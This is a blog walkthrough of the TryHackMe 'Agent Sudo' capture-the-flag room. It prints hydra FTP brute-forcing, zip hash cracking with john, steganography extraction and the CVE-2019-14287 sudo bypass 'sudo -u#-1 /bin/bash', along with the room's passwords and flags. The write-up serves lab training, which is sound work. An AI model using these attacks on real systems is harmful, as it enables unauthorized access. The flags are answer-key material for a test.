Challenges: Agent Sudo (TryHackMe)

JebitokJebitok
6 min read

Table of contents

Welcome to my walkthrough of the Agent Sudo room on TryHackMe — a CTF that tests your ability to pivot through enumeration, hash cracking, steganography, and privilege escalation. This challenge blends web recon, curiosity-driven digging, and a touch of real-world OSINT. Throughout this write-up, I’ll walk through the steps I took to discover hidden agents, crack credentials, uncover secrets buried in images, and finally gain root access by exploiting a known vulnerability.

Let’s jump in and dissect the mystery one flag at a time. 👇

Author note

Welcome to another THM exclusive CTF room. Your task is simple, capture the flags just like the other CTF room. Have Fun!

If you are stuck inside the black hole, post on the forum or ask in the TryHackMe discord.

Enumerate

Enumerate the machine and get all the important information

Answer the questions below

  1. How many open ports? 3

    nmap -sV <IP_Address>

  2. How do you redirect yourself to a secret page? user-agent

    One thing about cybersecurity is that one has to be curious and willing to explore every possibility of where to find the flag, expected answer, solve the problem, or identify a vulnerability. For this case, checking gobuster doesn’t reveal it, but checking the site http://<IP_Address> on the browser

gobuster dir -u <IP_Address> -w /usr/share/wordlists/dirb/common.txt

  1. What is the agent name? chris

    I tried navigating around but couldn’t find the name. With some research, I learned that Burp Suite would be an option, but it didn’t work for my case

    Eventually, this revealed the name: curl -A "C" -L http://<ip_address>

Details about curl -A "C" -L http://<ip_address> properties

PartWhat it does
curlThe command-line tool used to make HTTP requests.
-A "C"Sets the User-Agent header to "C", as required by the challenge. This tricks the server into thinking you're a specific "agent."
-LFollow redirects. If the server responds with a 301 or 302 (redirect), curl follows the redirect automatically.
<ip_address>The target web server (e.g., http://10.10.150.81).

🧠 Why -L was Needed

When you first visit a site like http://<ip>, it might return a redirect to another page (like /secret or /agent/landing). Without -L, curl just shows you the Location: header and stops. With -L, curl follows the redirection and retrieves the final page.

You can test it yourself by omitting -L:

bashCopyEditcurl -A "C" http://<ip_address>

You’ll likely see something like:

pgsqlCopyEditHTTP/1.1 302 Found
Location: /agent-page

But with -Lcurl follows it and shows you the actual page contents.

✅ Summary on curl -A "C" -L

👉 Sets the user-agent to "C" (to satisfy the challenge requirement)
👉 Follows redirects to reach the actual content
👉 ✅ Successfully bypasses the protection and gives you the page meant for agent "C"

Hash cracking and brute-force

Done enumerate the machine? Time to brute your way out.

Answer the questions below

  1. FTP password crystal

    hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://<IP_Address>

  2. Zip file password alien

    $ ftp <IP_ADDRESS>

    Enter username(chris) and password (FTP password)

    $ mget *

    We are now able to access the files through the root folder. Steghide and other libraries were not helpful, but binwalk was helpful, but we had to uninstall and install Capstone if you experience issues like we did.

    sudo pip3 uninstall capstone

    sudo pip3 install capstone==4.0.2

    binwalk -e cutie.png

    Now we have the _cutie.png.extracted which has the zip file we’re looking for. Here are the next steps:

    ls _cutie.png.extracted

    cd _cutie.png.extracted

    zip2john 8702.zip > zip_hash.txt ls cat zip_hash.txt john zip_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

  3. steg password Area51

    tried different tools, 7-Zip worked eventually, and I was able to view the txt file. It revealed a hash, and I used CyberChef to convert from base64.

    sudo apt install p7zip-full

    7z x -palien 8702.zip

    // note -palien stands for -p and password (alien)

    cat To_agentR.txt

  4. Who is the other agent (in full name)? james

    steghide extract -sf cute-alien-jpg

    cat message.txt

  5. SSH password hackerrules!

Capture the user flag

You know the drill.

Answer the questions below

  1. What is the user flag? b03d975e8c92a7c04146cfa7a5a313c7

    Since we got the SSH password in the previous task and knew the name of the user (james) we’ll use SSH to switch to user james’ privileges to access the user flag and escalate privileges in the next steps

  2. What is the incident of the photo called? Roswell alien autopsy

    We had to download the image we saw within James’s user into the root user in order to reverse search it using Google, and using some OSINT search skills, we were able to find the incident as reported by Fox News

    After uploading the image to Google reverse image search, these were the exact matches that came up, and reading through most of the article, we see a hint of alien, Area 51, and Roswell. Next step is to Google search ones linked to ‘area 51 + alien + roswell + foxnews’, whichever format you’ll use to search. A couple of Fox News articles come up, but the one that stood out is this one

Privilege escalation

Enough with the extraordinary stuff? Time to get real.

Answer the questions below

  1. CVE number for the escalation

    (Format: CVE-xxxx-xxxx) CVE-2019-14287

    tried the hostnamectl among other options to find a clue to the CVE. Eventually, I came across this sudo -l. Using the result, especially the command hint at the bottom, you’ll find this CVE-2019-14287

    as part of the web results. Checking the exploit you’ll see that it has both the commands you see on james and on the root results of sudo -l

    When you find the CVE yo

    To escalate privileges with the help of the CVE and what we have, when we use:

    sudo -u#-1 /bin/bash

    Privileges are escalated to root, and we can now find the file that has the root flag

  2. What is the root flag? b53a02f55b57d4439e3341834d70c062

  1. (Bonus) Who is Agent R? DesKel

This room was a solid reminder that good enumeration and a questioning mindset are key in CTFs. From manipulating User-Agents and extracting files from images, to tracking agents through OSINT and exploiting CVE-2019-14287 for privilege escalation, Agent Sudo proved that creativity matters just as much as technical skill.

Thanks for checking out my write-up — and as always, stay curious, keep learning, and happy hacking! Until next time. 🚀

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

CVEPrivilege EscalationtryhackmesudoCTF Writeupsteganographybrute force

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.